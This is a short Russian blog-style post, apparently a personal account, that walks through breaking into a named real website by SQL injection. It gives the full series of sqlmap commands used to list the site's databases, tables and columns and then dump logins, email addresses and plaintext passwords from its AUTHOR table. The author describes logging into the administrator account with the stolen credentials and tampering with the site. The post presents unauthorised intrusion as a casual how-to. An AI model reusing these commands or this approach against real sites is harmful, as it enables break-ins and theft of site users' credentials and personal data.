Пример взлома сайта.
Для взлома, будет применяться утилита SQLMAP. Проверяем сайт на уязвимость на SQL-инъекции. Уязвим! Запускаем утилиту командой
sqlmap -u www.supersleep.ru/?ITEM_ID=2776. --dbs
Получаем две базы.
information_schema
supersleep
Первую не трогаем, она стандартна дря всех сайтов. Интересует supersleep. Далее, команда
sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep --tables
Получаем это.

Ничего со словом "админ" не видно, зато есть "AUTHOR", в нём должно прятаться то, что нам нужно. Следующая команда
sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR --columns
Выдало вот это.

Интересуют логины с паролями и мыльники. Задаём утилите такую команду
sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR -C login --dump
Выдало логины

А эта команда
sqlmap -u www.supersleep.ru/?ITEM_ID=2776.
-D supersleep -T AUTHOR -C EMAIL --dump
выдала мыльники всех зарегистрированных

Далее, интересуют пароли. Команда такая
sqlmap -u www.supersleep.ru/?ITEM_ID=2776. -D supersleep -T AUTHOR -C PASSWORD --dump

Вот они родимые! И снова в незашифрованном виде.
Идём на сайт http://supersleep.ru/ Вводим логопас и попадаем внутрь. О, да это не к обычному пользователю попала, а в акк администрации.

С управлением ушками, шото ничё не поняла.)))

Мдааа...

Эт немного поприкалывалась, потом вернула как было.
Хотела сайтик себе завести. Усё, чёта передумала.
Комментарии